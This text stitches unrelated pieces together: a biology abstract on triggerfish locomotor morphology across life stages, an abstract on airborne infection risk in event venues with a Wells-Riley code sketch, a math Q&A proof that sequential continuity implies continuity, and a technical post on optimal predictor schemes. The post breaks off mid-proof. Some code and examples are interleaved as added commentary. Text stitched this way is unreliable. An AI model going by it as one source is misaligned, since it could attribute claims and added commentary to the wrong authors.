Across the Tree of Life, most studies of phenotypic disparity and diversification have been restricted to adult organisms. However, many lineages have distinct ontogenetic phases that do not reflect the same traits as their adult forms. Non-adult disparity patterns are particularly important to consider for coastal ray-finned fishes, which often have juvenile phases with distinct phenotypes. These juvenile forms are often associated with sheltered nursery environments, with phenotypic shifts between adults and juvenile stages that are readily apparent in locomotor morphology. However, whether this ontogenetic variation in locomotor morphology reflects a decoupling of diversification dynamics between life stages remains unknown. Here we investigate the evolutionary dynamics of locomotor morphology between adult and juvenile triggerfishes. Integrating a time-calibrated phylogenetic framework with geometric morphometric approaches and measurement data of fin aspect ratio and incidence, we reveal a mismatch between morphospace occupancy, the evolution of morphological disparity, and the tempo of trait evolution between life stages. Collectively, our results illuminate how the heterogeneity of morpho-functional adaptations can decouple the mode and tempo of morphological diversification between ontogenetic stages.
2022 · Author(s): Lukas Siebler, Torben Rathje, Maurizio Calandri, Konstantinos Stergiaropoulos, Bernhard Richter, ...
Operators of event locations are particularly affected by a pandemic: the resulting restrictions may make their business uneconomical. With previous models, only an incomplete quantitative risk assessment is possible, from which no suitable restrictions can be derived. Hence, a mathematical and statistical model has been developed to link measurement data of substance dispersion in rooms with epidemiological data such as incidences, reproduction numbers, vaccination rates and test qualities. This allows, for the first time, an overall assessment of airborne infection risks in large event locations. In such venues, displacement ventilation concepts are often implemented; in this case, simplified theoretical assumptions fail to predict the airflows relevant to infection processes. Thus, with locally resolved trace-gas measurements and specific data on infection processes, individual risks can be computed in more detail. By including many measurement positions, an assessment of entire event locations is possible. Embedding the overall model in a flexible application, daily updated epidemiological data allow up-to-date calculations of expected new infections and the individual risks of single visitors for a certain event. With this model, an instrument has been created that can help policymakers and operators take appropriate measures and check restrictions for their effect.
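For context, room-scale airborne-infection models of this kind typically build on the classical Wells-Riley relation. The sketch below shows that baseline only (the paper's trace-gas-resolved model is more detailed), with purely illustrative parameter values:

```python
# Classical Wells-Riley relation: P = 1 - exp(-I q p t / Q).
# This is standard background, not the paper's model; all numbers below
# are illustrative assumptions.
import math

def wells_riley(n_infectors, quanta_rate, breathing_rate, hours, clean_air_flow):
    """Probability of infection for one susceptible visitor."""
    dose = n_infectors * quanta_rate * breathing_rate * hours / clean_air_flow
    return 1.0 - math.exp(-dose)

# e.g. 1 infector emitting 20 quanta/h, visitor breathing 0.5 m^3/h,
# a 2 h event, and 3000 m^3/h of effective clean-air delivery:
p = wells_riley(1, 20.0, 0.5, 2.0, 3000.0)
print(f"individual infection risk = {p:.2%}")  # roughly 0.7%
```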
|
Prove that if $\lim_{n \to \infty} f(x_n) = f(\lim_{n \to \infty} x_n)$ for all sequences that converge to $x$, then $f$ is continuous [duplicate]
Let $\lim_{n \to \infty} f(x_n) = f(x)$ for all sequences $\{ x_n \}$ such that $\lim_{n \to \infty} x_n = x$. I am trying to prove that $f$ is continuous.
I know that for all $\varepsilon > 0$ there exists $N \in \mathbb{N}$ such that $|f(x) - f(x_n)| < \varepsilon$ for all $n \ge N$. I also know that there exists $\delta > 0$ such that $|x - x_n| < \delta$ for all $n \in \mathbb{N}$, since a convergent sequence is bounded.
But I need to find a number $\delta > 0$ such that $|f(x) - f(x_0)| < \varepsilon$, if $|x - x_0| < \delta$. For any sequence $\{ x_n \}$ there will be an $x_0 \notin \{ x_n \}$ such that $|x - x_0| < \delta$, since the reals are not countable. I guess I need to show that any $x_0$ belongs to some sequence that converges to $x$ and that satisfies $|x - x_0| < \delta$. Is this the correct approach or am I missing something?
HINT: you can use the contrapositive to prove the result; that is, showing $A\implies B$ is equivalent to showing $\lnot B\implies\lnot A$.
Let $S:=\{(x_n):x_n\in{\rm dom}(f)\text{ and }\lim x_n=x\}$. In this setting, showing that
$$\forall(x_n)\in S: \lim f(x_n)=f(x)\implies f\text{ is continuous at }x$$
is equivalent to showing that
$$f\text{ is not continuous at }x\implies\exists(x_n)\in S:\lim f(x_n)\neq f(x)$$
Suppose that $f$ is discontinuous at $x_0$. Then there is an $\varepsilon>0$ such that, for each $\delta>0$, there is a number $x$ with $|x-x_0|<\delta$ and $\bigl|f(x)-f(x_0)\bigr|\geqslant\varepsilon$. In particular, for each $n\in\mathbb N$, there is an $x_n$ such that $|x_n-x_0|<\frac1n$ and $\bigl|f(x_n)-f(x_0)\bigr|\geqslant\varepsilon$. So, $\lim_{n\to\infty}x_n=x_0$, but $\lim_{n\to\infty}f(x_n)\neq f(x_0)$.
Suppose, by contradiction, that $f(x)\not\rightarrow f(x_0)$ as $x\rightarrow x_0$. Then there exists $\varepsilon>0$ such that for every $\delta>0$ there exists $x\in(x_0-\delta,x_0+\delta)$ such that $|f(x)-f(x_0)|>\varepsilon$.
We use this to construct a sequence that converges to $x_0$:
For $\delta=1$ there exists $x_1\in (x_0-1,x_0+1)$ such that $|f(x_0)-f(x_1)|>\varepsilon$.
For $\delta=\frac{1}{2}$ there exists $x_2\in(x_0-\frac{1}{2},x_0+\frac{1}{2})$ such that $|f(x_0)-f(x_2)|>\varepsilon$.
Continue this way...
For $\delta = \frac{1}{n}$ there exists $x_n\in(x_0-\frac{1}{n},x_0+\frac{1}{n})$ such that $|f(x_0)-f(x_n)|>\varepsilon$.
Now $|x_0-x_n|<\frac{1}{n}\rightarrow 0$ as $n\rightarrow\infty$, therefore $x_n\rightarrow x_0$. But $|f(x_0)-f(x_n)|>\varepsilon$ for every $n\in\mathbb{N}$, which contradicts the assumption.
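For a concrete illustration of this construction (an added example, not part of the original answer): take $f=\operatorname{sgn}$ with the convention $\operatorname{sgn}(0)=0$, and $x_0=0$, so $f$ is discontinuous at $0$ with $\varepsilon=\tfrac{1}{2}$. The recipe produces, e.g., $x_n=\tfrac{1}{n+1}\in(x_0-\tfrac1n,x_0+\tfrac1n)$ with $|f(x_0)-f(x_n)|=1>\varepsilon$; hence $x_n\rightarrow 0$ while $f(x_n)=1\not\rightarrow 0=f(0)$.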
|
post by Vadim Kosoy
We introduce a variant of optimal predictor schemes where optimality holds within the space of random algorithms with logarithmic advice. These objects are also guaranteed to exist for the error space $$\Delta_{avg}^2$$. We introduce the class of generatable problems and construct a uniform universal predictor scheme for this class which is optimal in the new sense with respect to the $$\Delta^2_{avg}$$ error space. This is achieved by a construction similar to Levin’s universal search.
# New notation
Given $$n \in {\mathbb{N}}$$, $$ev_n: {\mathbb{N}}\times {{\{ 0, 1 \}^*}}^{n+1} \xrightarrow{alg} {{\{ 0, 1 \}^*}}$$ is the following algorithm. When $$ev_n^k(Q,x_1 \ldots x_n)$$ is computed, $$Q$$ is interpreted as a program and $$Q(x_1 \ldots x_n)$$ is executed for time $$k$$. The resulting output is produced.
The notation $$ev^k(Q,x_1 \ldots x_n)$$ means $$ev_n^k(Q,x_1 \ldots x_n)$$.
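To fix intuition, here is a hypothetical Python model of this evaluator. Programs are modeled as generator functions that yield once per computation step; this is an illustrative assumption, not the formal binary-program semantics.

```python
# Hypothetical model of the time-bounded evaluator ev: run Q on its inputs
# for at most k steps and produce the output, or the empty word on timeout.
def ev(k, Q, *xs):
    """Q is a generator function; one yield models one computation step."""
    steps = Q(*xs)
    try:
        for _ in range(k):
            next(steps)
    except StopIteration as halt:               # Q halted within the budget
        return halt.value if halt.value is not None else ""
    return ""                                   # budget exhausted: no output

# Example program: doubles each character of its input, one step per character.
def double(x):
    out = ""
    for ch in x:
        out += ch + ch
        yield
    return out

print(ev(10, double, "ab"))  # "aabb" (halts within budget)
print(ev(1, double, "ab"))   # ""     (budget too small)
```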
$$\beta: {{\{ 0, 1 \}^*}}\rightarrow [0,1]$$ is the mapping from a binary expansion to the corresponding real number.
Given $$\mu$$ a word ensemble, $$X$$ a set, $$Q: {{\{ 0, 1 \}^*}}^2 \xrightarrow{alg} X$$, $$T_Q^{\mu}(k,s)$$ stands for the maximal runtime of $$Q(x,y)$$ for $$x \in \operatorname{supp}\mu^k$$, $$y \in {{\{ 0, 1 \}^{s}}}$$.
Previous posts focused on prediction of distributional decision problems, which is the “computational uncertainty” analogue of probability. Here, we use the broader concept of predicting distributional estimation problems (functions), which is analogous to expectation value.
# Definition 1
A distributional estimation problem is a pair $$(f, \mu)$$ where $$f: {{\{ 0, 1 \}^*}}\rightarrow [0,1]$$ is an arbitrary function (even irrational values are allowed) and $$\mu$$ is a word ensemble.
# Definition 2
Given an appropriate set $$X$$, consider $$P: {\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} X$$, $$r: {\mathbb{N}}^2 \rightarrow {\mathbb{N}}$$ polynomial and $$a: {\mathbb{N}}^2 \rightarrow {{\{ 0, 1 \}^*}}$$. The triple $$(P, r, a)$$ is called an $$X$$-valued $$(poly, log)$$-bischeme when
1. The runtime of $$P(k, j, x, y, z)$$ is bounded by $$p(k, j)$$ with $$p$$ polynomial.
2. $$|a(k,j)| \leq c_1 + c_2 \log (k+1) + c_3 \log (j+1)$$ for some $$c_1,c_2,c_3 \in {\mathbb{N}}$$.
A $$[0,1]$$-valued $$(poly, log)$$-bischeme will also be called a $$(poly, log)$$-predictor scheme.
We think of $$P$$ as a random algorithm where the second word parameter represents its internal coin tosses. The third word parameter represents the advice and we usually substitute $$a$$ there.
We will use the notations $$P^{kj}(x,y,z):=P(k,j,x,y,z)$$, $$a^{kj}:=a(k,j)$$.
# Definition 3
Fix $$\Delta$$ an error space of rank 2 and $$(f, \mu)$$ a distributional estimation problem. Consider $$(P, r, a)$$ a $$(poly, log)$$-predictor scheme. $$(P, r, a)$$ is called a $$\Delta(poly, log)$$-optimal predictor scheme for $$(f,\mu)$$ when for any $$(poly, log)$$-predictor scheme $$(Q,s,b)$$, there is $$\delta \in \Delta$$ s.t.
$E_{\mu^k \times U^{r(k,j)}}[(P^{kj}(x,y,a^{kj})-f(x))^2] \leq E_{\mu^k \times U^{s(k,j)}}[(Q^{kj}(x,y,b^{kj})-f(x))^2] + \delta(k,j)$
# Note 1
The notation $$(poly, log)$$ is meant to remind us that we allow a polynomial quantity of random bits $$r(k,j)$$ and a logarithmic quantity of advice $$|a^{kj}|$$. In fact, the definitions and some of the theorems can be generalized to other quantities of random and advice (see also Note B.1). Thus, predictor schemes from previous posts are $$(poly,poly)$$-predictor schemes, $$(poly,O(1))$$-predictor schemes are limited to O(1) advice, $$(log,0)$$-predictor schemes use a logarithmic number of random bits and no advice and so on. As usual in complexity theory, it is redundant to consider more advice than random since advice is strictly more powerful.
$$\Delta(poly, log)$$-optimal predictor schemes satisfy properties analogous to those of $$\Delta$$-optimal predictor schemes. These properties are listed in Appendix A. The proofs of Theorems A.1 and A.4 are given in Appendix B. The other proofs are straightforward adaptations of the corresponding proofs with polynomial advice.
We also have the following existence result:
# Theorem 1
Consider $$(f,\mu)$$ a distributional estimation problem. Define $$\Upsilon: {\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} [0,1]$$ by
$\Upsilon^{kj}(x,y,Q) := \beta(ev^j(Q,x,y))$
Define $$\upsilon_{f,\mu}: {\mathbb{N}}^2 \rightarrow {{\{ 0, 1 \}^*}}$$ by
$\upsilon_{f,\mu}^{kj}:={\underset{|Q| \leq \log j}{\operatorname{arg\,min}}\,} E_{\mu^k \times U^j}[(\Upsilon^{kj}(x,y,Q)-f(x))^2]$
Then, $$(\Upsilon, j, \upsilon_{f,\mu})$$ is a $$\Delta_{avg}^2(poly, log)$$-optimal predictor scheme for $$(f,\mu)$$.
# Note 2
Consider a distributional decision problem $$(D, \mu)$$. Assume $$(D, \mu)$$ admits $$n \in {\mathbb{N}}$$, $$A: {\mathbb{N}}\times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} \{0,1\}$$, $$a: {\mathbb{N}}\rightarrow {{\{ 0, 1 \}^*}}$$ and a function $$r: {\mathbb{N}}\rightarrow {\mathbb{N}}$$ s.t.
1. $$A(k,x,y,z)$$ runs in quasi-polynomial time ($$O(2^{\log^n k})$$).
2. $|a(k)| = O(\log^n k)$
3. ${\lim_{k \rightarrow \infty}{Pr_{\mu^k \times U^{r(k)}}[A(k,x,y,a(k)) \neq \chi_D(x)]}} = 0$
Then it is easy to see we can construct a $$(poly,log)$$-predictor scheme $$P_A$$ taking values in $$\{0,1\}$$ s.t. $$E[(P_A-f)^2] \in \Delta_{avg}^2$$. The implication doesn’t work for larger sizes of time or advice. Therefore, the uncertainty represented by $$\Delta_{avg}^2(poly,log)$$-optimal predictor schemes is associated with the resource gap between quasi-polynomial time plus advice $$O(\log^n k)$$ and the resources needed to (heuristically) solve the problem in question.
The proof of Theorem 1 is given in Appendix C: it is a straightforward adaptation of the corresponding proof for polynomial advice. Evidently, the above scheme is non-uniform. We will now describe a class of problems which admits uniform $$\Delta_{avg}^2(poly, log)$$-optimal predictor schemes.
# Definition 4
Consider $$\Delta^1$$ an error space of rank 1. A word ensemble $$\mu$$ is called $$\Delta^1(log)$$-sampleable when there is $$S: {\mathbb{N}}\times {{\{ 0, 1 \}^*}}^2 \xrightarrow{alg} {{\{ 0, 1 \}^*}}$$ that runs in polynomial time in the 1st argument, $$a^S: {\mathbb{N}}\rightarrow {{\{ 0, 1 \}^*}}$$ of logarithmic size and $$r^S: {\mathbb{N}}\rightarrow {\mathbb{N}}$$ a polynomial such that
$\sum_{x \in {{\{ 0, 1 \}^*}}} |\mu^k(x) - Pr_{U^{r^S(k)}}[S^k(y,a^S(k))=x]| \in \Delta^1$
$$(S, r^S, a^S)$$ is called a $$\Delta^1(log)$$-sampler for $$\mu$$.
# Definition 5
Consider $$\Delta^1$$ an error space of rank 1. A distributional estimation problem $$(f, \mu)$$ is called $$\Delta^1(log)$$-generatable when there are $$S: {\mathbb{N}}\times {{\{ 0, 1 \}^*}}^2 \xrightarrow{alg} {{\{ 0, 1 \}^*}}$$ and $$F: {\mathbb{N}}\times {{\{ 0, 1 \}^*}}^2 \xrightarrow{alg} [0,1]$$ that run in polynomial time in the 1st argument, $$a^S: {\mathbb{N}}\rightarrow {{\{ 0, 1 \}^*}}$$ of logarithmic size and $$r^S: {\mathbb{N}}\rightarrow {\mathbb{N}}$$ a polynomial such that
1. $$(S, r^S, a^S)$$ is a $$\Delta^1(log)$$-sampler for $$\mu$$.
2. $E_{U^{r^S(k)}}[(F^k(y,a^S(k))-f(S^k(y,a^S(k))))^2] \in \Delta^1$
$$(S, F, r^S, a^S)$$ is called a $$\Delta^1(log)$$-generator for $$(f, \mu)$$.
When $$a^S$$ is the empty string, $$(S,F,r^S)$$ is called a $$\Delta^1(0)$$-generator for $$(f, \mu)$$. Such $$(f, \mu)$$ is called $$\Delta^1(0)$$-generatable.
# Note 3
The class of $$\Delta^1(0)$$-generatable problems can be regarded as an average-case analogue of $$NP \cap coNP$$. If $$f$$ is a decision problem (i.e. its range is $$\{0,1\}$$), words $$y \in {{\{ 0, 1 \}^{r^S(k)}}}$$ s.t. $$S^k(y)=x$$, $$F^k(y)=1$$ can be regarded as “proofs” of $$f(x)=1$$ and words $$y \in {{\{ 0, 1 \}^{r^S(k)}}}$$ s.t. $$S^k(y)=x$$, $$F^k(y)=0$$ can be regarded as “proofs” of $$f(x)=0$$.
# Theorem 2
There is an oracle machine $$\Lambda$$ that accepts an oracle of signature $$SF: {\mathbb{N}}\times {{\{ 0, 1 \}^*}}\rightarrow {{\{ 0, 1 \}^*}}\times [0,1]$$ and a polynomial $$r: {\mathbb{N}}\rightarrow {\mathbb{N}}$$ where the allowed oracle calls are $$SF^k(x)$$ for $$|x|=r(k)$$ and computes a function of signature $${\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^2 \rightarrow [0,1]$$ s.t. for any $$(f, \mu)$$ a distributional estimation problem and $$G:=(S, F, r^S, a^S)$$ a corresponding $$\Delta_0^1(log)$$-generator, $$\Lambda[G]$$ is a $$\Delta_{avg}^2(poly,log)$$-optimal predictor scheme for $$(f,\mu)$$.
In particular if $$(f,\mu)$$ is $$\Delta_0^1(0)$$-generatable, we get a uniform $$\Delta_{avg}^2(poly,log)$$-optimal predictor scheme.
The following is the description of $$\Lambda$$. Consider $$SF: {\mathbb{N}}\times {{\{ 0, 1 \}^*}}\rightarrow {{\{ 0, 1 \}^*}}\times [0,1]$$ and a polynomial $$r: {\mathbb{N}}\rightarrow {\mathbb{N}}$$. We describe the computation of $$\Lambda[SF,r]^{kj}(x)$$ where the extra argument of $$\Lambda$$ is regarded as internal coin tosses.
We loop over the first $$j$$ words in lexicographic order. Each word is interpreted as a program $$Q: {{\{ 0, 1 \}^*}}^2 \xrightarrow{alg} [0,1]$$. We loop over $$jk$$ “test runs”. At test run $$i$$, we generate $$(x_i \in {{\{ 0, 1 \}^*}}, t_i \in [0,1])$$ by evaluating $$SF^k(y_i)$$ for $$y_i$$ sampled from $$U^{r(k)}$$. We then sample $$z_i$$ from $$U^j$$ and compute $$s_i:=ev^{j}(Q,x_i,z_i)$$. At the end of the test runs, we compute the average error $$\epsilon(Q):=\frac{1}{jk}\sum_{i} (s_i - t_i)^2$$. At the end of the loop over programs, the program $$Q^*$$ with the lowest error is selected and the output $$ev^{j}(Q^*,x)$$ is produced.
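A minimal Python sketch of this selection loop follows; the enumeration `programs`, the oracle `SF`, and the evaluator `ev` are hypothetical stand-ins for the formal objects, and `ev` is assumed here to already return $$\beta(ev^j(Q,x,z)) \in [0,1]$$.

```python
# Minimal sketch of the universal scheme Lambda described above: Levin-style
# search over the first j programs, scored by empirical squared error on
# j*k generated test cases. All inputs are hypothetical stand-ins.
import random

def Lambda(SF, r, k, j, x, programs, ev):
    """Pick the program among the first j with the lowest average error on
    j*k test runs, then run it on x for j steps."""
    best_q, best_err = None, float("inf")
    for Q in programs[:j]:                      # first j programs
        err = 0.0
        for _ in range(j * k):                  # j*k "test runs"
            y = random.getrandbits(r(k))        # y_i sampled from U^{r(k)}
            x_i, t_i = SF(k, y)                 # oracle: sample x_i, value t_i
            z_i = random.getrandbits(j)         # internal coins for Q, from U^j
            err += (ev(j, Q, x_i, z_i) - t_i) ** 2
        if err / (j * k) < best_err:
            best_q, best_err = Q, err / (j * k)
    z = random.getrandbits(j)                   # coins for the final run
    return ev(j, best_q, x, z) if best_q is not None else 0.0
```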
The proof that this construction is $$\Delta_{avg}^2(poly,log)$$-optimal is given in Appendix C.
## Appendix A
Fix $$\Delta$$ an error space of rank 2.
# Theorem A.1
Suppose there is a polynomial $$h: {\mathbb{N}}^2 \rightarrow {\mathbb{N}}$$ s.t. $$h^{-1} \in \Delta$$. Consider $$(f, \mu)$$ a distributional estimation problem and $$(P,r,a)$$ a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f, \mu)$$. Suppose $$\{p_{kj} \in [0,1]\}_{k,j \in {\mathbb{N}}}$$, $$\{q_{kj} \in [0,1]\}_{k,j \in {\mathbb{N}}}$$ are s.t.
$\exists \epsilon > 0 \; \forall k,j: (\mu^k \times U^{r(k,j)})\{(x,y) \in {{\{ 0, 1 \}^*}}^2 \mid p_{kj} \leq P^{kj}(x,y,a^{kj}) \leq q_{kj}\} \geq \epsilon$
Define
$\phi_{kj} := {E_{\mu^k \times U^{r(k,j)}}[f(x)-P^{kj}(x,y,a^{kj}) \mid p_{kj} \leq P^{kj}(x,y,a^{kj}) \leq q_{kj}]}$
Assume that either $$p_{kj}, q_{kj}$$ have a number of digits logarithmically bounded in $$k,j$$ or $$P^{kj}$$ produces outputs with a number of digits logarithmically bounded in $$k,j$$ (by Theorem A.7 if any $$\Delta(poly,log)$$-optimal predictor scheme exists for $$(f, \mu)$$ then a $$\Delta(poly,log)$$-optimal predictor scheme with this property exists as well). Then, $$|\phi| \in \Delta$$.
# Theorem A.2
Consider $$\mu$$ a word ensemble and $$f_1, f_2: {{\{ 0, 1 \}^*}}\rightarrow [0,1]$$ s.t. $$f_1 + f_2 \leq 1$$. Suppose $$(P_1,r_1,a_1)$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f_1, \mu)$$ and $$(P_2,r_2,a_2)$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f_2, \mu)$$. Define $$P: {\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} [0,1]$$ by $$P^{kj}(x, y_1 y_2, (z_1, z_2)):=\eta(P^{kj}_1(x,y_1,z_1) + P^{kj}_2(x,y_2,z_2))$$ for $$|y_i|=r_i(k,j)$$. Then, $$(P,r_1+r_2,a_1 a_2)$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f_1 + f_2, \mu)$$.
# Theorem A.3
Consider $$\mu$$ a word ensemble and $$f_1, f_2: {{\{ 0, 1 \}^*}}\rightarrow [0,1]$$ s.t. $$f_1 + f_2 \leq 1$$. Suppose $$(P_1,r_1,a_1)$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f_1, \mu)$$ and $$(P,r_2,a_2)$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f_1 + f_2, \mu)$$. Define $$P_2: {\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} [0,1]$$ by $$P^{kj}_2(x, y_1 y_2, (z_1, z_2)):=\eta(P^{kj}(x,y_1,z_1) - P^{kj}_1(x,y_2,z_2))$$ for $$|y_i|=r_i(k,j)$$. Then, $$(P_2,r_1+r_2,a_1 a_2)$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f_2, \mu)$$.
# Theorem A.4
Fix $$\Delta^1$$ an error space of rank 1 s.t. given $$\delta^1 \in \Delta^1$$, the function $$\delta(k,j):=\delta^1(k)$$ lies in $$\Delta$$. Consider $$(f_1, \mu_1)$$, $$(f_2, \mu_2)$$ distributional estimation problems with respective $$\Delta(poly,log)$$-optimal predictor schemes $$(P_1,r_1,a_1)$$ and $$(P_2,r_2,a_2)$$. Assume $$\mu_1$$ is $$\Delta^1(log)$$-sampleable and $$(f_2, \mu_2)$$ is $$\Delta^1(log)$$-generatable. Define $$f_1 \times f_2: {{\{ 0, 1 \}^*}}\rightarrow [0,1]$$ by $$(f_1 \times f_2)(x_1,x_2)=f_1(x_1) f_2(x_2)$$ and $$(f_1 \times f_2)(y)=0$$ for $$y$$ not of this form. Define $$P: {\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} [0,1]$$ by $$P^{kj}((x_1,x_2), y_1 y_2, (z_1, z_2)):=P^{kj}_1(x_1,y_1,z_1) P^{kj}_2(x_2,y_2,z_2)$$ for $$|y_i|=r_i(k,j)$$. Then, $$(P,r_1 + r_2,(a_1,a_2))$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f_1 \times f_2, \mu_1 \times \mu_2)$$.
# Theorem A.5
Consider $$f: {{\{ 0, 1 \}^*}}\rightarrow [0,1]$$, $$D \subseteq {{\{ 0, 1 \}^*}}$$ and $$\mu$$ a word ensemble. Assume $$(P_D,r_D,a_D)$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(D, \mu)$$ and $$(P_{f \mid D},r_{f \mid D},a_{f \mid D})$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f, \mu \mid D)$$. Define $$P: {\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} [0,1]$$ by $$P^{kj}(x, y_1 y_2, (z_1, z_2)):=P^{kj}_D(x,y_1,z_1) P^{kj}_{f \mid D}(x,y_2,z_2)$$ for $$|y_i|=r_i(k,j)$$. Then $$(P, r_D+r_{f \mid D},(a_D, a_{f \mid D}))$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(\chi_D f, \mu)$$.
# Theorem A.6
Fix $$h$$ a polynomial s.t. $$2^{-h} \in \Delta$$. Consider $$f: {{\{ 0, 1 \}^*}}\rightarrow [0,1]$$, $$D \subseteq {{\{ 0, 1 \}^*}}$$ and $$\mu$$ a word ensemble. Assume $$\exists \epsilon > 0 \; \forall k: \mu^k(D) \geq \epsilon$$. Assume $$(P_D,r_D,a_D)$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(D, \mu)$$ and $$(P_{\chi_D f},r_{\chi_D f},a_{\chi_D f})$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(\chi_D f, \mu)$$. Define $$P_{f \mid D}: {\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} [0,1]$$ by
$P^{kj}_{f \mid D}(x,y_1 y_2, (z_1, z_2)) := \begin{cases}1 & \text{if } P^{kj}_D(x,y_2,z_2) = 0 \\ \eta(\frac{P^{kj}_{\chi_D f}(x,y_1,z_1)}{P^{kj}_D(x,y_2,z_2)}) & \text{rounded to }h(k,j)\text{ binary places if } P^{kj}_D(x,y_2,z_2) > 0 \end{cases}$
Then, $$(P_{f \mid D},r_D+r_{\chi_D f},(a_{\chi_D f}, a_D))$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f, \mu \mid D)$$.
# Definition A.1
Consider $$\mu$$ a word ensemble and $$\hat{Q}_1:=(Q_1,s_1,b_1)$$, $$\hat{Q}_2:=(Q_2,s_2,b_2)$$ $$(poly,log)$$-predictor schemes. We say $$\hat{Q}_1$$ is $$\Delta$$-similar to $$\hat{Q}_2$$ relative to $$\mu$$ (denoted $$\hat{Q}_1 \underset{\Delta}{\overset{\mu}{\simeq}} \hat{Q}_2$$) when $$E_{\mu^k \times U^{s_1(k,j)} \times U^{s_2(k,j)}}[(Q_1^{kj}(x,y_1,b^{kj}_1)-Q_2^{kj}(x,y_2,b^{kj}_2))^2] \in \Delta$$.
# Theorem A.7
Consider $$(f, \mu)$$ a distributional estimation problem, $$\hat{P}$$ a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f, \mu)$$ and $$\hat{Q}$$ a $$(poly,log)$$-predictor scheme. Then, $$\hat{Q}$$ is a $$\Delta(poly,log)$$-optimal predictor scheme for $$(f, \mu)$$ if and only if $$\hat{P} \underset{\Delta}{\overset{\mu}{\simeq}} \hat{Q}$$.
# Note A.1
$$\Delta$$-similarity is not an equivalence relation on the set of arbitrary $$(poly,log)$$-predictor schemes. However, it is an equivalence relation on the set of $$(poly,log)$$-predictor schemes $$\hat{Q}$$ satisfying $$\hat{Q} \underset{\Delta}{\overset{\mu}{\simeq}} \hat{Q}$$ (i.e. the $$\mu$$-expectation value of the intrinsic variance of $$\hat{Q}$$ is in $$\Delta$$). In particular, for any $$f: {{\{ 0, 1 \}^*}}\rightarrow [0,1]$$ any $$\Delta(poly,log)$$-optimal predictor scheme for $$(f,\mu)$$ has this property.
# Definition B.1
Given $$n \in {\mathbb{N}}$$, a function $$\delta: {\mathbb{N}}^{2+n} \rightarrow {\mathbb{R}}^{\geq 0}$$ is called $$\Delta$$-moderate when
1. $$\delta$$ is non-decreasing in arguments $$3$$ to $$2+n$$.
2. For any collection of polynomials $$\{p_i: {\mathbb{N}}^2 \rightarrow {\mathbb{N}}\}_{i < n}$$, $$\delta(k, j, p_0(k,j) \ldots p_{n-1}(k,j)) \in \Delta$$
# Lemma B.1
Fix $$(f, \mu)$$ a distributional estimation problem and $$\hat{P}:=(P,r,a)$$ a $$(poly,log)$$-predictor scheme. Then, $$\hat{P}$$ is $$\Delta(poly,log)$$-optimal iff there is a $$\Delta$$-moderate function $$\delta: {\mathbb{N}}^4 \rightarrow [0,1]$$ s.t. for any $$k,j,s \in {\mathbb{N}}$$, $$Q: {{\{ 0, 1 \}^*}}^2 \xrightarrow{alg} [0,1]$$
$E_{\mu^k \times U^{r(k,j)}}[(P^{kj}(x,y,a^{kj})-f(x))^2] \leq E_{\mu^k \times U^s}[(Q(x,y)-f(x))^2] + \delta(k,j,T_Q^{\mu}(k,s),2^{|Q|})$
# Proof of Lemma B.1
Define
$\delta(k,j,t,u):=\max_{\substack{T_Q^{\mu}(k,s) \leq t \\ |Q| \leq \log u}} \{ E_{\mu^k \times U^{r(k,j)}}[(P^{kj}(x,y,a^{kj})-f(x))^2] - E_{\mu^k \times U^s}[(Q(x,y)-f(x))^2] \}$
# Note B.1
Lemma B.1 shows that the error bound for $$\Delta(poly,log)$$-optimal predictor schemes is in some sense uniform with respect to $$Q$$. This doesn't generalize to e.g. $$\Delta(poly,O(1))$$-optimal predictor schemes. The latter still admit a weaker version of Theorem A.1 and direct analogues of Theorems A.2, A.3, A.5, A.6 and A.7. Theorem A.4 doesn't seem to generalize.
# Lemma B.2
Suppose there is a polynomial $$h: {\mathbb{N}}^2 \rightarrow {\mathbb{N}}$$ s.t. $$h^{-1} \in \Delta$$. Fix $$(f, \mu)$$ a distributional estimation problem and $$(P,r,a)$$ a corresponding $$\Delta(poly,log)$$-optimal predictor scheme. Consider $$(Q,s,b)$$ a $$(poly,log)$$-predictor scheme, $$M > 0$$, $$w: {\mathbb{N}}^2 \times {{\{ 0, 1 \}^*}}^3 \xrightarrow{alg} {\mathbb{Q}}\cap [0,M]$$ with runtime bounded by a polynomial in the first two arguments, and $$u: {\mathbb{N}}^2 \rightarrow {{\{ 0, 1 \}^*}}$$ of logarithmic size. Then there is $$\delta \in \Delta$$ s.t.
$E_{\mu^k \times U^{\max(r(k,j),s(k,j))}}[w^{kj}(x,y,u^{kj})(P^{kj}(x,y_{\leq r(k,j)},a^{kj})-f(x))^2] \leq E_{\mu^k \times U^{\max(r(k,j),s(k,j))}}[w^{kj}(x,y,u^{kj})(Q^{kj}(x,y_{\leq s(k,j)},b^{kj})-f(x))^2] + \delta(k, j)$
# Proof of Lemma B.2
Given $$t \in [0,M]$$, define $$\alpha^{kj}(t)$$ to be $$t$$ rounded within error $$h(k,j)^{-1}$$. Thus, the number of digits in $$\alpha^{kj}(t)$$ is logarithmic in $$k$$ and $$j$$. Denote $$q(k,j):=\max(r(k,j),s(k,j))$$. Consider $$\hat{Q}_t:=(Q_t, r+s, b_t)$$ the $$(poly,log)$$-predictor scheme defined by
